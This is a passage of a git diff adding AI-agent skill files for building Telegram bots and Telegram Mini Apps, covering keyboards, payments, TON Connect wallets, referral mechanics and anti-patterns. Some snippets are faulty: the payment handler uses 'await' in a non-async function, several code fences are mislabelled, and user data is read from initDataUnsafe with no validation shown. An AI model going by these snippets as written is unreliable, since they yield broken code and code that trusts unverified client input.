|
||||
### Basic Keyboard
|
||||
```javascript
|
||||
import { Markup } from 'telegraf';
|
||||
|
||||
bot.command('menu', (ctx) => {
|
||||
ctx.reply('Choose an option:', Markup.inlineKeyboard([
|
||||
[Markup.button.callback('Option 1', 'opt_1')],
|
||||
[Markup.button.callback('Option 2', 'opt_2')],
|
||||
[
|
||||
Markup.button.callback('Yes', 'yes'),
|
||||
Markup.button.callback('No', 'no'),
|
||||
],
|
||||
]));
|
||||
});
|
||||
|
||||
// Handle button clicks
|
||||
bot.action('opt_1', (ctx) => {
|
||||
ctx.answerCbQuery('You chose Option 1');
|
||||
ctx.editMessageText('You selected Option 1');
|
||||
});
|
||||
```
|
||||
|
||||
### Keyboard Patterns
|
||||
| Pattern | Use Case |
|
||||
|---------|----------|
|
||||
| Single column | Simple menus |
|
||||
| Multi column | Yes/No, pagination |
|
||||
| Grid | Category selection |
|
||||
| URL buttons | Links, payments |
|
||||
|
||||
### Pagination
|
||||
```javascript
|
||||
function getPaginatedKeyboard(items, page, perPage = 5) {
|
||||
const start = page * perPage;
|
||||
const pageItems = items.slice(start, start + perPage);
|
||||
|
||||
const buttons = pageItems.map(item =>
|
||||
[Markup.button.callback(item.name, `item_${item.id}`)]
|
||||
);
|
||||
|
||||
const nav = [];
|
||||
if (page > 0) nav.push(Markup.button.callback('◀️', `page_${page-1}`));
|
||||
if (start + perPage < items.length) nav.push(Markup.button.callback('▶️', `page_${page+1}`));
|
||||
|
||||
return Markup.inlineKeyboard([...buttons, nav]);
|
||||
}
|
||||
```
|
||||
```
|
||||
|
||||
### Bot Monetization
|
||||
|
||||
Making money from Telegram bots
|
||||
|
||||
**When to use**: When planning bot revenue
|
||||
|
||||
```javascript
|
||||
## Bot Monetization
|
||||
|
||||
### Revenue Models
|
||||
| Model | Example | Complexity |
|
||||
|-------|---------|------------|
|
||||
| Freemium | Free basic, paid premium | Medium |
|
||||
| Subscription | Monthly access | Medium |
|
||||
| Per-use | Pay per action | Low |
|
||||
| Ads | Sponsored messages | Low |
|
||||
| Affiliate | Product recommendations | Low |
|
||||
|
||||
### Telegram Payments
|
||||
```javascript
|
||||
// Create invoice
|
||||
bot.command('buy', (ctx) => {
|
||||
ctx.replyWithInvoice({
|
||||
title: 'Premium Access',
|
||||
description: 'Unlock all features',
|
||||
payload: 'premium_monthly',
|
||||
provider_token: process.env.PAYMENT_TOKEN,
|
||||
currency: 'USD',
|
||||
prices: [{ label: 'Premium', amount: 999 }], // $9.99
|
||||
});
|
||||
});
|
||||
|
||||
// Handle successful payment
|
||||
bot.on('successful_payment', (ctx) => {
|
||||
const payment = ctx.message.successful_payment;
|
||||
// Activate premium for user
|
||||
await activatePremium(ctx.from.id);
|
||||
ctx.reply('🎉 Premium activated!');
|
||||
});
|
||||
```
|
||||
|
||||
### Freemium Strategy
|
||||
```
|
||||
Free tier:
|
||||
- 10 uses per day
|
||||
- Basic features
|
||||
- Ads shown
|
||||
|
||||
Premium ($5/month):
|
||||
- Unlimited uses
|
||||
- Advanced features
|
||||
- No ads
|
||||
- Priority support
|
||||
```
|
||||
|
||||
### Usage Limits
|
||||
```javascript
|
||||
async function checkUsage(userId) {
|
||||
const usage = await getUsage(userId);
|
||||
const isPremium = await checkPremium(userId);
|
||||
|
||||
if (!isPremium && usage >= 10) {
|
||||
return { allowed: false, message: 'Daily limit reached. Upgrade?' };
|
||||
}
|
||||
return { allowed: true };
|
||||
}
|
||||
```
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Blocking Operations
|
||||
|
||||
**Why bad**: Telegram has timeout limits.
|
||||
Users think bot is dead.
|
||||
Poor experience.
|
||||
Requests pile up.
|
||||
|
||||
**Instead**: Acknowledge immediately.
|
||||
Process in background.
|
||||
Send update when done.
|
||||
Use typing indicator.
|
||||
|
||||
### ❌ No Error Handling
|
||||
|
||||
**Why bad**: Users get no response.
|
||||
Bot appears broken.
|
||||
Debugging nightmare.
|
||||
Lost trust.
|
||||
|
||||
**Instead**: Global error handler.
|
||||
Graceful error messages.
|
||||
Log errors for debugging.
|
||||
Rate limiting.
|
||||
|
||||
### ❌ Spammy Bot
|
||||
|
||||
**Why bad**: Users block the bot.
|
||||
Telegram may ban.
|
||||
Annoying experience.
|
||||
Low retention.
|
||||
|
||||
**Instead**: Respect user attention.
|
||||
Consolidate messages.
|
||||
Allow notification control.
|
||||
Quality over quantity.
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `telegram-mini-app`, `backend`, `ai-wrapper-product`, `workflow-automation`
|
||||
279
skills/telegram-mini-app/SKILL.md
Normal file
279
skills/telegram-mini-app/SKILL.md
Normal file
@@ -0,0 +1,279 @@
|
||||
---
|
||||
name: telegram-mini-app
|
||||
description: "Expert in building Telegram Mini Apps (TWA) - web apps that run inside Telegram with native-like experience. Covers the TON ecosystem, Telegram Web App API, payments, user authentication, and building viral mini apps that monetize. Use when: telegram mini app, TWA, telegram web app, TON app, mini app."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Telegram Mini App
|
||||
|
||||
**Role**: Telegram Mini App Architect
|
||||
|
||||
You build apps where 800M+ Telegram users already are. You understand
|
||||
the Mini App ecosystem is exploding - games, DeFi, utilities, social
|
||||
apps. You know TON blockchain and how to monetize with crypto. You
|
||||
design for the Telegram UX paradigm, not traditional web.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Telegram Web App API
|
||||
- Mini App architecture
|
||||
- TON Connect integration
|
||||
- In-app payments
|
||||
- User authentication via Telegram
|
||||
- Mini App UX patterns
|
||||
- Viral Mini App mechanics
|
||||
- TON blockchain integration
|
||||
|
||||
## Patterns
|
||||
|
||||
### Mini App Setup
|
||||
|
||||
Getting started with Telegram Mini Apps
|
||||
|
||||
**When to use**: When starting a new Mini App
|
||||
|
||||
```javascript
|
||||
## Mini App Setup
|
||||
|
||||
### Basic Structure
|
||||
```html
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<script src="https://telegram.org/js/telegram-web-app.js"></script>
|
||||
</head>
|
||||
<body>
|
||||
<script>
|
||||
const tg = window.Telegram.WebApp;
|
||||
tg.ready();
|
||||
tg.expand();
|
||||
|
||||
// User data
|
||||
const user = tg.initDataUnsafe.user;
|
||||
console.log(user.first_name, user.id);
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
### React Setup
|
||||
```jsx
|
||||
// hooks/useTelegram.js
|
||||
export function useTelegram() {
|
||||
const tg = window.Telegram?.WebApp;
|
||||
|
||||
return {
|
||||
tg,
|
||||
user: tg?.initDataUnsafe?.user,
|
||||
queryId: tg?.initDataUnsafe?.query_id,
|
||||
expand: () => tg?.expand(),
|
||||
close: () => tg?.close(),
|
||||
ready: () => tg?.ready(),
|
||||
};
|
||||
}
|
||||
|
||||
// App.jsx
|
||||
function App() {
|
||||
const { tg, user, expand, ready } = useTelegram();
|
||||
|
||||
useEffect(() => {
|
||||
ready();
|
||||
expand();
|
||||
}, []);
|
||||
|
||||
return <div>Hello, {user?.first_name}</div>;
|
||||
}
|
||||
```
|
||||
|
||||
### Bot Integration
|
||||
```javascript
|
||||
// Bot sends Mini App
|
||||
bot.command('app', (ctx) => {
|
||||
ctx.reply('Open the app:', {
|
||||
reply_markup: {
|
||||
inline_keyboard: [[
|
||||
{ text: '🚀 Open App', web_app: { url: 'https://your-app.com' } }
|
||||
]]
|
||||
}
|
||||
});
|
||||
});
|
||||
```
|
||||
```
|
||||
|
||||
### TON Connect Integration
|
||||
|
||||
Wallet connection for TON blockchain
|
||||
|
||||
**When to use**: When building Web3 Mini Apps
|
||||
|
||||
```python
|
||||
## TON Connect Integration
|
||||
|
||||
### Setup
|
||||
```bash
|
||||
npm install @tonconnect/ui-react
|
||||
```
|
||||
|
||||
### React Integration
|
||||
```jsx
|
||||
import { TonConnectUIProvider, TonConnectButton } from '@tonconnect/ui-react';
|
||||
|
||||
// Wrap app
|
||||
function App() {
|
||||
return (
|
||||
<TonConnectUIProvider manifestUrl="https://your-app.com/tonconnect-manifest.json">
|
||||
<MainApp />
|
||||
</TonConnectUIProvider>
|
||||
);
|
||||
}
|
||||
|
||||
// Use in components
|
||||
function WalletSection() {
|
||||
return (
|
||||
<TonConnectButton />
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
### Manifest File
|
||||
```json
|
||||
{
|
||||
"url": "https://your-app.com",
|
||||
"name": "Your Mini App",
|
||||
"iconUrl": "https://your-app.com/icon.png"
|
||||
}
|
||||
```
|
||||
|
||||
### Send TON Transaction
|
||||
```jsx
|
||||
import { useTonConnectUI } from '@tonconnect/ui-react';
|
||||
|
||||
function PaymentButton({ amount, to }) {
|
||||
const [tonConnectUI] = useTonConnectUI();
|
||||
|
||||
const handlePay = async () => {
|
||||
const transaction = {
|
||||
validUntil: Math.floor(Date.now() / 1000) + 60,
|
||||
messages: [{
|
||||
address: to,
|
||||
amount: (amount * 1e9).toString(), // TON to nanoton
|
||||
}]
|
||||
};
|
||||
|
||||
await tonConnectUI.sendTransaction(transaction);
|
||||
};
|
||||
|
||||
return <button onClick={handlePay}>Pay {amount} TON</button>;
|
||||
}
|
||||
```
|
||||
```
|
||||
|
||||
### Mini App Monetization
|
||||
|
||||
Making money from Mini Apps
|
||||
|
||||
**When to use**: When planning Mini App revenue
|
||||
|
||||
```javascript
|
||||
## Mini App Monetization
|
||||
|
||||
### Revenue Streams
|
||||
| Model | Example | Potential |
|
||||
|-------|---------|-----------|
|
||||
| TON payments | Premium features | High |
|
||||
| In-app purchases | Virtual goods | High |
|
||||
| Ads (Telegram Ads) | Display ads | Medium |
|
||||
| Referral | Share to earn | Medium |
|
||||
| NFT sales | Digital collectibles | High |
|
||||
|
||||
### Telegram Stars (New!)
|
||||
```javascript
|
||||
// In your bot
|
||||
bot.command('premium', (ctx) => {
|
||||
ctx.replyWithInvoice({
|
||||
title: 'Premium Access',
|
||||
description: 'Unlock all features',
|
||||
payload: 'premium',
|
||||
provider_token: '', // Empty for Stars
|
||||
currency: 'XTR', // Telegram Stars
|
||||
prices: [{ label: 'Premium', amount: 100 }], // 100 Stars
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### Viral Mechanics
|
||||
```jsx
|
||||
// Referral system
|
||||
function ReferralShare() {
|
||||
const { tg, user } = useTelegram();
|
||||
const referralLink = `https://t.me/your_bot?start=ref_${user.id}`;
|
||||
|
||||
const share = () => {
|
||||
tg.openTelegramLink(
|
||||
`https://t.me/share/url?url=${encodeURIComponent(referralLink)}&text=Check this out!`
|
||||
);
|
||||
};
|
||||
|
||||
return <button onClick={share}>Invite Friends (+10 coins)</button>;
|
||||
}
|
||||
```
|
||||
|
||||
### Gamification for Retention
|
||||
- Daily rewards
|
||||
- Streak bonuses
|
||||
- Leaderboards
|
||||
- Achievement badges
|
||||
- Referral bonuses
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Ignoring Telegram Theme
|
||||
|
||||
**Why bad**: Feels foreign in Telegram.
|
||||
Bad user experience.
|
||||
Jarring transitions.
|
||||
Users don't trust it.
|
||||
|
||||
**Instead**: Use tg.themeParams.
|
||||
Match Telegram colors.
|
||||
Use native-feeling UI.
|
||||
Test in both light/dark.
|
||||
|
||||
### ❌ Desktop-First Mini App
|
||||
|
||||
**Why bad**: 95% of Telegram is mobile.
|
||||
Touch targets too small.
|
||||
Doesn't fit in Telegram UI.
|
||||
Scrolling issues.
|
||||
|
||||
**Instead**: Mobile-first always.
|
||||
Test on real phones.
|
||||
Touch-friendly buttons.
|
||||
Fit within Telegram frame.
|
||||
|
||||
### ❌ No Loading States
|
||||
|
||||
**Why bad**: Users think it's broken.
|
||||
Poor perceived performance.
|
||||
High exit rate.
|
||||
Confusion.
|
||||
|
||||
**Instead**: Show skeleton UI.
|
||||
Loading indicators.
|
||||
Progressive loading.
|
||||
Optimistic updates.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Not validating initData from Telegram | high | ## Validating initData |
|
||||
| TON Connect not working on mobile | high | ## TON Connect Mobile Issues |
|
||||
| Mini App feels slow and janky | medium | ## Mini App Performance |
|
||||
| Custom buttons instead of MainButton | medium | ## Using MainButton Properly |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `telegram-bot-builder`, `frontend`, `blockchain-defi`, `viral-generator-builder`
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user